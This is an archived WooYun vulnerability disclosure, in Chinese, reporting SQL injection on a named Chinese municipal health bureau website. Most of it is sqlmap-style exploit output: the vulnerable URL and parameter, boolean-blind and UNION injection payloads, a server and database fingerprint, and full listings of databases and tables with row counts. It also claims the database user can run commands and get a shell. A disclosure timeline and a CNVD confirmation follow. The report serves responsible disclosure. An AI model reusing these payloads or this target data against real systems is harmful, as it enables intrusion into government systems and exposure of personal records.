乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-08: 厂商已经确认,细节仅向厂商公开 2015-04-18: 细节向核心白帽子及相关领域专家公开 2015-04-28: 细节向普通白帽子公开 2015-05-08: 细节向实习白帽子公开 2015-05-23: 细节向公众公开
某市卫生局纪检监察存在SQL注射。泄露百万信息
包头市卫生局纪检监察室网址:http://www.btswsjjc.com/index.php存在漏洞的urlhttp://btswsjjc.com/news.php?id=105
HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=105 AND 9269=9269 Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: id=-9231 UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(81)+CHAR(89)+CHAR(84)+CHAR(74)+CHAR(76)+CHAR(81)+CHAR(84)+CHAR(104)+CHAR(114)+CHAR(81)+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.5back-end DBMS: Microsoft SQL Server 2000
看表跟数据
back-end DBMS: Microsoft SQL Server 2000available databases [9]:[*] btswsjjc_data[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] SiteWeaver[*] tempdb[*] ydyfDatabase: tempdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------+---------+Database: SiteWeaver+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.his_sportshell | 83400 || dbo.wsj_ddjgflms | 35202 || dbo.wsj_ddjgflms | 35202 || dbo.wsj_ddmain | 17597 || dbo.wsj_bdtj | 16955 || dbo.wsj_sjsc | 16625 || dbo.wsj_xmhz | 15033 || dbo.wsj_xmbm | 9712 || dbo.his_yljgrywh | 7555 || dbo.wsj_ypbm | 4620 || dbo.sysconstraints | 872 || dbo.wsj_clbm | 701 || dbo.PE_Log | 592 || dbo.wsj_jyxmlx | 325 || dbo.his_dxcz | 300 || dbo.PE_JsFile | 277 || dbo.PE_InfoS | 239 || dbo.PE_GuestBook | 226 || dbo.PE_Article | 222 || dbo.admin_message | 219 || dbo.admin_content | 73 || dbo.PE_Label | 73 || dbo.wsj_yljg | 73 || dbo.PE_NewKeys | 54 || dbo.PE_Channel | 26 || dbo.wsj_ypgl | 24 || dbo.PE_Dictionary | 22 || dbo.PE_Announce | 19 || dbo.PE_MailChannel | 19 || dbo.PE_Soft | 16 || dbo.wsj_ddtj | 15 || dbo.PE_FriendSite | 11 || dbo.PE_PayPlatform | 11 || dbo.admin_class | 10 || dbo.PE_UserGroup | 9 || dbo.PE_UserGroup | 9 || dbo.PE_ConsumeLog | 8 || dbo.PE_Contacter | 8 || dbo.PE_PaymentType | 7 || dbo.admin_down | 6 || dbo.PE_DeliverType | 6 || dbo.PE_HouseConfig | 5 || dbo.PE_DownError | 4 || dbo.PE_Skin | 4 || dbo.wsj_ddnr | 4 || dbo.PE_Class | 3 || dbo.PE_TemplateProject | 3 || dbo.PE_TemplateProject | 3 || dbo.syssegments | 3 || dbo.wsj_ryb | 3 || dbo.PE_Advertisement | 2 || dbo.PE_AdZone | 2 || dbo.PE_GuestKind | 2 || dbo.wsj_ydyfsjsc | 2 || dbo.admin_baseset | 1 || dbo.admin_user | 1 || dbo.PE_Admin | 1 || dbo.PE_Config | 1 || dbo.PE_Favorite | 1 || dbo.PE_PageClass | 1 || dbo.PE_PageClass | 1 || dbo.PE_Photo | 1 || dbo.PE_Photo | 1 || dbo.wsj_cllx | 1 || dbo.wsj_count | 1 || dbo.wsj_czsz | 1 |+--------------------------------------+---------+Database: btswsjjc_data+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.wsjgl_ddxm | 627996 || dbo.his_sportshell | 83400 || dbo.wsj_ddjgflms | 23066 || dbo.wsj_ddjgflms | 23066 || dbo.wsj_xmhz | 14935 || dbo.wsj_ddmain | 11531 || dbo.wsj_bdtj | 10891 || dbo.wsj_xmbm | 9614 || dbo.his_yljgrywh | 7555 || dbo.wsj_ypbm | 4620 || dbo.wsj_sjsc | 3449 || dbo.sysconstraints | 855 || dbo.wsj_clbm | 701 || dbo.PE_Log | 592 || dbo.wsj_jyxmlx | 325 || dbo.PE_JsFile | 277 || dbo.PE_InfoS | 239 || dbo.PE_GuestBook | 226 || dbo.PE_Article | 222 || dbo.his_dxcz | 189 || dbo.PE_Label | 73 || dbo.wsj_yljg | 72 || dbo.PE_NewKeys | 54 || dbo.wsj_ddtj | 38 || dbo.PE_Channel | 26 || dbo.wsj_ypgl | 24 || dbo.PE_Dictionary | 22 || dbo.PE_MailChannel | 19 || dbo.admin_content | 16 || dbo.PE_Soft | 16 || dbo.PE_FriendSite | 11 || dbo.PE_PayPlatform | 11 || dbo.admin_class | 10 || dbo.PE_UserGroup | 9 || dbo.PE_UserGroup | 9 || dbo.PE_ConsumeLog | 8 || dbo.PE_Contacter | 8 || dbo.PE_PaymentType | 7 || dbo.admin_down | 6 || dbo.PE_DeliverType | 6 || dbo.PE_HouseConfig | 5 || dbo.admin_pic | 4 || dbo.PE_DownError | 4 || dbo.PE_Skin | 4 || dbo.wsj_ddnr | 4 || dbo.PE_Class | 3 || dbo.PE_TemplateProject | 3 || dbo.PE_TemplateProject | 3 || dbo.syssegments | 3 || dbo.wsj_ryb | 3 || dbo.PE_Advertisement | 2 || dbo.PE_AdZone | 2 || dbo.PE_GuestKind | 2 || dbo.wsj_ydyfsjsc | 2 || dbo.admin_baseset | 1 || dbo.admin_user | 1 || dbo.PE_Admin | 1 || dbo.PE_Config | 1 || dbo.PE_Favorite | 1 || dbo.PE_PageClass | 1 || dbo.PE_PageClass | 1 || dbo.PE_Photo | 1 || dbo.wsj_cllx | 1 || dbo.wsj_count | 1 || dbo.wsj_czsz | 1 |+--------------------------------------+---------+Database: msdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.RTblRelships | 6910 || dbo.RTblIfaceHier | 3345 || dbo.RTblVersionAdminInfo | 2328 || dbo.RTblVersions | 2328 || dbo.RTblNamedObj | 2191 || dbo.RTblIfaceMem | 1186 || dbo.RTblPropDefs | 794 || dbo.RTblClassDefs | 537 || dbo.RTblIfaceDefs | 452 || dbo.RTblProps | 392 || dbo.RTblRelColDefs | 320 || dbo.RTblRelshipDefs | 144 || dbo.RTblParameterDef | 136 || dbo.sysconstraints | 99 || dbo.RTblSites | 38 || dbo.backupfile | 36 || dbo.RTblRelshipProps | 28 || dbo.syscategories | 19 || dbo.backupmediafamily | 18 || dbo.backupmediaset | 18 || dbo.backupset | 18 || dbo.RTblTypeLibs | 16 || dbo.sysalerts | 9 || dbo.restorefilegroup | 8 || dbo.restorefilegroup | 8 || dbo.restorehistory | 8 || dbo.sysdtscategories | 3 || dbo.syssegments | 3 || dbo.RTblDatabaseVersion | 1 || dbo.sysdbmaintplans | 1 || dbo.systargetservers_view | 1 || dbo.systargetservers_view | 1 |+--------------------------------------+---------+Database: pubs+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.roysched | 86 || dbo.employee | 43 || dbo.sysconstraints | 36 || dbo.titleauthor | 25 || dbo.titleview | 25 || dbo.authors | 23 || dbo.sales | 21 || dbo.titles | 18 || dbo.jobs | 14 || dbo.pub_info | 8 || dbo.publishers | 8 || dbo.stores | 6 || dbo.discounts | 3 || dbo.syssegments | 3 |+--------------------------------------+---------+Database: master+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| INFORMATION_SCHEMA.PARAMETERS | 3350 || INFORMATION_SCHEMA.ROUTINES | 960 || dbo.spt_values | 727 || INFORMATION_SCHEMA.COLUMNS | 392 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 154 || INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 63 || INFORMATION_SCHEMA.TABLES | 36 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 34 || dbo.spt_server_info | 29 || INFORMATION_SCHEMA.VIEWS | 26 || dbo.spt_provider_types | 25 || dbo.spt_datatype_info_ext | 10 || dbo.spt_datatype_info_ext | 10 || INFORMATION_SCHEMA.SCHEMATA | 7 || dbo.syssegments | 3 || dbo.MSreplication_options | 2 || dbo.syslogins | 2 || dbo.spt_monitor | 1 || dbo.sysconstraints | 1 || dbo.sysoledbusers | 1 |+--------------------------------------+---------+Database: ydyf+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.wsjyd_kpb | 399156 || dbo.wsjyd_kpfj3 | 5992 || dbo.wsjydkp_tsjl | 3068 || dbo.wsjyd_ydkpdjb | 1823 || dbo.wsjyd_ry | 960 || dbo.wsjydkp_xgry | 885 || dbo.wsjyd_xm | 124 || dbo.his_ryjsgx | 95 || dbo.wsjyd_ksry | 72 || dbo.Wsjyd_ks | 68 || dbo.his_jsmenugx | 31 || dbo.his_jsmenugx | 31 || dbo.his_menu | 25 || dbo.sysconstraints | 24 || dbo.wsjyd_nd | 4 || dbo.syssegments | 3 || dbo.wsjyd_zdlx | 3 || dbo.wsjyd_zdlx | 3 || dbo.his_ldksgx | 1 || dbo.his_ryksgx | 1 || dbo.his_sydw | 1 || dbo.wsjyd_yljg | 1 |+--------------------------------------+---------+Database: model+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------+---------+Database: Northwind+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.[Order Details Extended] | 2155 || dbo.[Order Details Extended] | 2155 || dbo.Invoices | 2155 || dbo.[Order Subtotals] | 830 || dbo.[Orders Qry] | 830 || dbo.[Orders Qry] | 830 || dbo.[Summary of Sales by Quarter] | 809 || dbo.[Summary of Sales by Year] | 809 || dbo.[Customer and Suppliers by City] | 120 || dbo.Customers | 91 || dbo.[Quarterly Orders] | 86 || dbo.[Product Sales for 1997] | 77 || dbo.[Sales by Category] | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Current Product List] | 69 || dbo.[Products by Category] | 69 || dbo.[Sales Totals by Amount] | 66 || dbo.Territories | 53 || dbo.EmployeeTerritories | 49 || dbo.sysconstraints | 43 || dbo.Suppliers | 29 || dbo.[Products Above Average Price] | 25 || dbo.[Products Above Average Price] | 25 || dbo.Employees | 9 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.Shippers | 3 || dbo.syssegments | 3 |+--------------------------------------+---------+
current user 权限过大可执行命令
可列举全盘资料可shell
危害等级:高
漏洞Rank:11
确认时间:2015-04-08 08:24
CNVD确认并复现所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置。
暂无
